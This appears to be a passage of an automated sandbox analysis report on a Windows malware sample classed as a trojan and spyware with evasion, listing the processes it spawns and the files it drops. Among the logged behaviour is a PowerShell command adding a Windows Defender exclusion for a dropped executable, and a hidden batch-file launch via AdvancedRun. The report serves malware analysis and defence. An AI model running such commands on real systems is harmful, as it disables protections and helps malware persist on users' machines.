Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 23_2_6D24B8F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2440FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 23_2_6D2440FD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2470C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 23_2_6D2470C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2800C2 ZwAlertThreadByThreadId, 23_2_6D2800C2
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2898D0 ZwQueryAttributesFile, 23_2_6D2898D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A0D0 ZwCreateTimer2, 23_2_6D28A0D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2810D7 ZwOpenKey,ZwCreateKey, 23_2_6D2810D7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249335 ZwClose,ZwClose, 23_2_6D249335
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D275306 ZwReleaseKeyedEvent, 23_2_6D275306
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244B00 TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 23_2_6D244B00
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289B00 ZwSetValueKey, 23_2_6D289B00
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D30131B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 23_2_6D2F6369
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AB60 ZwReleaseKeyedEvent, 23_2_6D28AB60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 23_2_6D2D6365
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 23_2_6D2C7365
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D256B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 23_2_6D256B6B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AB70 ZwReleaseWorkerFactoryWorker, 23_2_6D28AB70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242B7E ZwSetInformationThread,ZwClose, 23_2_6D242B7E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 23_2_6D273B7A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 23_2_6D2D8372
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318B58
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D273B48 ZwClose,ZwClose, 23_2_6D273B48
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318BB6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A3A0 ZwGetCompleteWnfStateSubscription, 23_2_6D28A3A0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 23_2_6D274BAD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D319BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D319BBE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D301BA8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D251B8F RtlInitUnicodeString,ZwQueryLicenseValue,RtlAllocateHeap,ZwQueryLicenseValue,RtlFreeHeap, 23_2_6D251B8F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 23_2_6D242B93
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A390 ZwGetCachedSigningLevel, 23_2_6D28A390
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 23_2_6D27939F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D30138A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 23_2_6D25A3E0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2423F6 ZwClose,RtlFreeHeap, 23_2_6D2423F6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289BF0 ZwAlertThreadByThreadId, 23_2_6D289BF0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 23_2_6D242BC2
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D244A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 23_2_6D244A20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 23_2_6D2D4A28
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AA20 ZwQuerySecurityAttributesToken, 23_2_6D28AA20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 23_2_6D26A229
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError, 23_2_6D27B230
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289A30 ZwTerminateThread, 23_2_6D289A30
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D248239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 23_2_6D248239
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 23_2_6D318214
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289A00 ZwProtectVirtualMemory, 23_2_6D289A00
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E216 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose, 23_2_6D24E216
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245210 RtlGetCurrentDirectory_U,memcpy,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 23_2_6D245210
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318A62
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 23_2_6D249240
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 23_2_6D2D1242
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289A50 ZwCreateFile, 23_2_6D289A50
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2452A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 23_2_6D2452A5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D241AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 23_2_6D241AA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose, 23_2_6D24BAA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D275AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId, 23_2_6D275AA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289AB0 ZwWaitForMultipleObjects, 23_2_6D289AB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27E2BB ZwWaitForAlertByThreadId, 23_2_6D27E2BB
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess, 23_2_6D262280
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B280 ZwWow64DebuggerCall, 23_2_6D28B280
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 23_2_6D27DA88
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 23_2_6D27D294
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AA90 ZwQuerySystemInformationEx, 23_2_6D28AA90
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 23_2_6D24429E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FEAE9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings, 23_2_6D2FEAE9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289AE0 ZwTraceEvent, 23_2_6D289AE0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AAE0 ZwRaiseException, 23_2_6D28AAE0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AAF0 ZwRaiseHardError, 23_2_6D28AAF0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AAC0 ZwQueryWnfStateNameInformation, 23_2_6D28AAC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318ADD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess, 23_2_6D26FAD0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1AD6 ZwFreeVirtualMemory, 23_2_6D2D1AD6
PE file does not import any functions
Source: 1105.tmp.23.dr Static PE information: No import functions for PE file found
Source: 610B.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9D57.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: argjvbv.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 59B4.exe.5.dr Static PE information: Section: ZLIB complexity 0.996572265625
Source: 59B4.exe.5.dr Static PE information: Section: ZLIB complexity 1.00024038462
Source: 59B4.exe.5.dr Static PE information: Section: ~\1847 ZLIB complexity 1.00537109375
Source: 8039.exe.5.dr Static PE information: Section: )EWhgNF ZLIB complexity 1.00034769918
Source: y4oMrtO1Mt.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\hrgjvbv Jump to behavior
Source: 1105.tmp.23.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/14@38/7
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 28_2_00401306
Source: y4oMrtO1Mt.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 28_2_0040A33B
Source: y4oMrtO1Mt.exe Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\y4oMrtO1Mt.exe "C:\Users\user\Desktop\y4oMrtO1Mt.exe"
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Process created: C:\Users\user\Desktop\y4oMrtO1Mt.exe "C:\Users\user\Desktop\y4oMrtO1Mt.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\hrgjvbv C:\Users\user\AppData\Roaming\hrgjvbv
Source: C:\Users\user\AppData\Roaming\hrgjvbv Process created: C:\Users\user\AppData\Roaming\hrgjvbv C:\Users\user\AppData\Roaming\hrgjvbv
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F72D.exe C:\Users\user\AppData\Local\Temp\F72D.exe
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Process created: C:\Users\user\AppData\Local\Temp\F72D.exe C:\Users\user\AppData\Local\Temp\F72D.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\59B4.exe C:\Users\user\AppData\Local\Temp\59B4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8039.exe C:\Users\user\AppData\Local\Temp\8039.exe
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process created: C:\Users\user\AppData\Local\Temp\8039.exe C:\Users\user\AppData\Local\Temp\8039.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9D57.exe C:\Users\user\AppData\Local\Temp\9D57.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B8B0.exe C:\Users\user\AppData\Local\Temp\B8B0.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\610B.exe C:\Users\user\AppData\Local\Temp\610B.exe
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process created: C:\Users\user\AppData\Local\Temp\610B.exe C:\Users\user\AppData\Local\Temp\610B.exe
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /EXEFilename "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\82DC.exe C:\Users\user\AppData\Local\Temp\82DC.exe
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /SpecialRun 4101d8 3544
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\argjvbv C:\Users\user\AppData\Roaming\argjvbv
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\B8B0.exe" -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Process created: C:\Users\user\Desktop\y4oMrtO1Mt.exe "C:\Users\user\Desktop\y4oMrtO1Mt.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F72D.exe C:\Users\user\AppData\Local\Temp\F72D.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Process created: C:\Users\user\AppData\Roaming\hrgjvbv C:\Users\user\AppData\Roaming\hrgjvbv Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Process created: C:\Users\user\AppData\Local\Temp\F72D.exe C:\Users\user\AppData\Local\Temp\F72D.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process created: C:\Users\user\AppData\Local\Temp\8039.exe C:\Users\user\AppData\Local\Temp\8039.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /EXEFilename "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\B8B0.exe" -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process created: C:\Users\user\AppData\Local\Temp\610B.exe C:\Users\user\AppData\Local\Temp\610B.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /SpecialRun 4101d8 3544
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 28_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F72D.tmp Jump to behavior
Source: B8B0.exe.5.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: B8B0.exe.5.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 28_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\8039.exe Mutant created: \Sessions\1\BaseNamedObjects\NVIDIA OpenGL Driver An application has requested more GPU memory than is available in the system. The application will now be closed. Error code: 6 Would you like to visit http://nvidia.custhelp.com/app/answers/detail/a_id/3553 for help?
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_01
Source: 19.2.59B4.exe.40000.0.unpack, bY6SuEh351L7GYyy67/NuxyqR8Fr0rqvtxOeE.cs Cryptographic APIs: 'CreateDecryptor'
Source: 19.2.59B4.exe.40000.0.unpack, bY6SuEh351L7GYyy67/NuxyqR8Fr0rqvtxOeE.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\9D57.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: y4oMrtO1Mt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 0000001C.00000000.907769722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.914935574.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.24.dr
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbU source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: C:\feze\liyixira.pdb source: 9D57.exe.5.dr
Source: Binary string: C:\samuf.pdb source: y4oMrtO1Mt.exe
Source: Binary string: _.pdb source: 610B.exe, 0000001B.00000002.954434043.00000000036B5000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 9D57.exe, 00000017.00000002.879476866.000000006D221000.00000020.00020000.sdmp, 1105.tmp.23.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbr9 source: 59B4.exe, 00000013.00000002.958716562.0000000000EB9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: 9D57.exe, 1105.tmp.23.dr
Source: Binary string: System.ServiceModel.pdbH source: 59B4.exe, 00000013.00000002.958905948.0000000000F3F000.00000004.00000020.sdmp
Source: Binary string: System.ServiceModel.pdb source: 59B4.exe, 00000013.00000002.958905948.0000000000F3F000.00000004.00000020.sdmp
